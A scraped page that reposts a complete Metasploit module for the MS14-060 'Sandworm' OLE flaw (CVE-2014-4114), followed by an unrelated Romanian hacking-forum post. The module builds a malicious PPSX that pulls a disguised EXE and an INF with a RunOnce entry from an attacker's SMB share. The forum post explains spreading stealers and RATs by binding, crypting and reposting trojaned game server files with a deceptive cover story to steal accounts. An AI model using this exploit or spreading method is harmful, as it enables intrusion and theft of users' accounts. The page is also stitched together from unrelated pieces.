Leaderboard

Full title MS14-060 Microsoft Windows OLE Package Manager Code Execution Exploit Date add 2014-10-18 Category remote exploits Platform windows CVE CVE-2014-4114 Description: This Metasploit module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "MS14-060 Microsoft Windows OLE Package Manager Code Execution", 'Description' => %q{ This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. However, based on our testing, the most reliable setup is on Windows platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to a failure in the CPackage::CreateTempFileName function. This module will generate three files: an INF, a GIF, and a PPSX file. You are required to set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an older version of Winodws (such as XP) work best for this because they require little configuration to get going. The PPSX file is what you should send to your target. In detail, the vulnerability has to do with how the Object Packager 2 component (packager.dll) handles an INF file that contains malicious registry changes, which may be leveraged for code execution. First of all, Packager does not load the INF file directly. But as an attacker, you can trick it to load your INF anyway by embedding the file path as a remote share in an OLE object. The packager will then treat it as a type of media file, and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will download it with a CopyFileW call, save it in a temp folder, and pass that information for later. The exploit will do this loading process twice: first for a fake gif file that's actually the payload, and the second for the INF file. The packager will also look at each OLE object's XML Presentation Command, specifically the type and cmd property. In the exploit, "verb" media command type is used, and this triggers the packager!CPackage::DoVerb function. Also, "-3" is used as the fake gif file's cmd property, and "3" is used for the INF. When the cmd is "-3", DoVerb will bail. But when "3" is used (again, for the INF file), it will cause the packager to try to find appropriate handler for it, which will end up with C:\Windows\System32\infDefaultInstall.exe, and that will install/run the malicious INF file, and finally give us arbitrary code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery 'sinn3r', # Metasploit module 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2014-4114'], ['OSVDB', '113140'], ['MSB', 'MS14-060'], ['BID', '70419'], ['URL' , 'http://www.isightpartners.com/2014/10/cve-2014-4114/'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/'], ['URL', 'http://blog.vulnhunt.com/index.php/2014/10/14/cve-2014-4114_sandworm-apt-windows-ole-package-inf-arbitrary-code-execution/'] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Targets' => [ ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}], ], 'Privileged' => false, 'DisclosureDate' => "Oct 14 2014", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']), OptString.new('UNCPATH', [ true, 'The UNC folder to use (Ex: \\\\192.168.1.1\\share)' ]) ], self.class) end def exploit @unc = validate_unc_path if @unc.nil? fail_with(Failure::BadConfig, "UNCPATH must be a remote shared folder") end print_status("Creating the EXE payload...") payload_name = "#{rand_text_alpha(4)}.gif" p = generate_payload_exe print_status("Creating the INF file...") inf_name = "#{rand_text_alpha(4)}.inf" inf = inf_file(payload_name) print_status("Creating '#{datastore['FILENAME']}' file ...") exe_stream = ole_exe(payload_name) inf_stream = ole_inf(inf_name) zip = zip_ppsx(exe_stream, inf_stream) file_create(zip) payload_path = my_file_create(p, payload_name) print_good("#{payload_name} stored at #{payload_path}, copy it to the remote share: #{@unc}") inf_path = my_file_create(inf, inf_name) print_good("#{inf_name} stored at #{inf_path}, copy it to the remote share: #{@unc}") end def validate_unc_path if datastore['UNCPATH'] =~ /^\\{2}[[:print:]]+\\[[:print:]]+\\*$/ unc = datastore['UNCPATH'] else unc = nil end unc end def my_file_create(data, name) ltype = "exploit.fileformat.#{self.shortname}" path = store_local(ltype, nil, data, name) path end def zip_ppsx(ole_exe, ole_inf) zip_data = {} data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template') Dir["#{data_dir}/**/**"].each do |file| unless File.directory?(file) zip_data[file.sub(data_dir,'')] = File.read(file) end end # add the otherwise skipped "hidden" file file = "#{data_dir}/_rels/.rels" zip_data[file.sub(data_dir,'')] = File.read(file) # put our own OLE streams zip_data['/ppt/embeddings/oleObject1.bin'] = ole_exe zip_data['/ppt/embeddings/oleObject2.bin'] = ole_inf # create the ppsx ppsx = Rex::Zip::Archive.new zip_data.each_pair do |k,v| ppsx.add_file(k,v) end ppsx.pack end def ole_inf(file_name) content = "EmbeddedStg2.txt\x00" content << "#{@unc}\\#{file_name}\x00" data = [content.length].pack('V') data << content ole = create_ole("\x01OLE10Native", data) ole end def ole_exe(file_name) content = "EmbeddedStg1.txt\x00" content << "#{@unc}\\#{file_name}\x00" data = [content.length].pack('V') data << content ole = create_ole("\x01OLE10Native", data) ole end def create_ole(stream_name, data) ole_tmp = Rex::Quickfile.new('ole') stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE) stm = stg.create_stream(stream_name) stm << data stm.close directory = stg.instance_variable_get(:@directory) directory.each_entry do |entry| if entry.instance_variable_get(:@_ab) == 'Root Entry' # 02260200-0000-0000-c000-000000000046 # Video clip clsid = Rex::OLE::CLSID.new("\x02\x26\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46") entry.instance_variable_set(:@_clsId, clsid) end end # write to disk stg.close ole_contents = File.read(ole_tmp.path) ole_tmp.close ole_tmp.unlink ole_contents end def inf_file(gif_name) inf = <<-EOF ; 61883.INF ; Copyright (c) Microsoft Corporation. All rights reserved. [Version] Signature = "$CHICAGO$" Class=61883 ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} Provider=%Msft% DriverVer=06/21/2006,6.1.7600.16385 [DestinationDirs] DefaultDestDir = 1 [DefaultInstall] RenFiles = RxRename AddReg = RxStart [RxRename] #{gif_name}.exe, #{gif_name} [RxStart]# HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\#{gif_name}.exe EOF inf end end # 00EAE150AD0BF41A 1337day.com [2014-10-19] 7D6E5B9B94F94D82 # Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

OK Rst , va intrebati cum am reusit eu sa "culeg" atatea log-uri , 83 de pagini , sunt destul de multe , mai ales ca sunt o gramada de chestii valoroase printre ele! Iti trebuie doar un pic de creier si desigur sa stii cum sa-l folosesti. Mai trebuie un virus (RAT , Stealer , Bot-Net , Backdoor ...) , un Icon-Changer , Binder. Sa le luam la rand. Virus: -Cu ajutorul lui captam informatiile sau "ne distram". -Este produsul ce vreti sa-l raspanditi pe internet. Icon-Changer: -Cu ajutorul lui schimbam icon-ul programului sa para mai realist. Binder: -Cu ajutorul lui putem face ca la executia unui anumit .exe , de exemplu cel de la fifa 07 , cand pornesti fifa-ul in urma lui o sa se execute si virusul. Crypter: -Cu ajutorul lui putem sa trecem virusul , deobicei , peste metodele de securitate a victimei. Bun , astea au fost partile usoare... Puteti afla de pe acest forum cum sa le folositi prin metoda de search. Acuma partea ce necesita mult creier.Raspandirea lui. In primul rand avem nevoie sa stim ce ne dorim. Daca ne dorim conturi metin2 , ne axam pe metin2 , daca ne dorim conturi pe un anumit loc , folosim acel loc. Asadar sa intelegeti daca vreti conturi de metin2 , incercati sa copiati un continut popular de metin2 , de exemplu serverfiles-uri , sau programe , le faceti cu acele programe de mai sus : binder , crypter , icon-changer , si dupa , cu ajutorul creierului vostru le repostati iarasi pe un site popular spunand : Imi cer suze ca repostez din nou acest serverfiles dar am rezolvat o gramada de bug-uri prin el + ca am schimbat un pic interfata la joc si merge acuma mai bine , autorul serverfiles-ului este tot acelasi dar vreau sa primesc si eu meritele mele prin niste puncte de reputatie. Am dat aici un exemplu cam care toata lumea ar cadea in plasa, multa bafta va doresc si nu folositi serverfiles-uri de d3v1lz !!

Incurajari adresate voua pentru tot ce faceti . Va multumesc pentru ca ramaneti aceasi oameni : Nytro este un om de expeptie pentru ca continua sa tina in functiune acest forum Link : -- // removed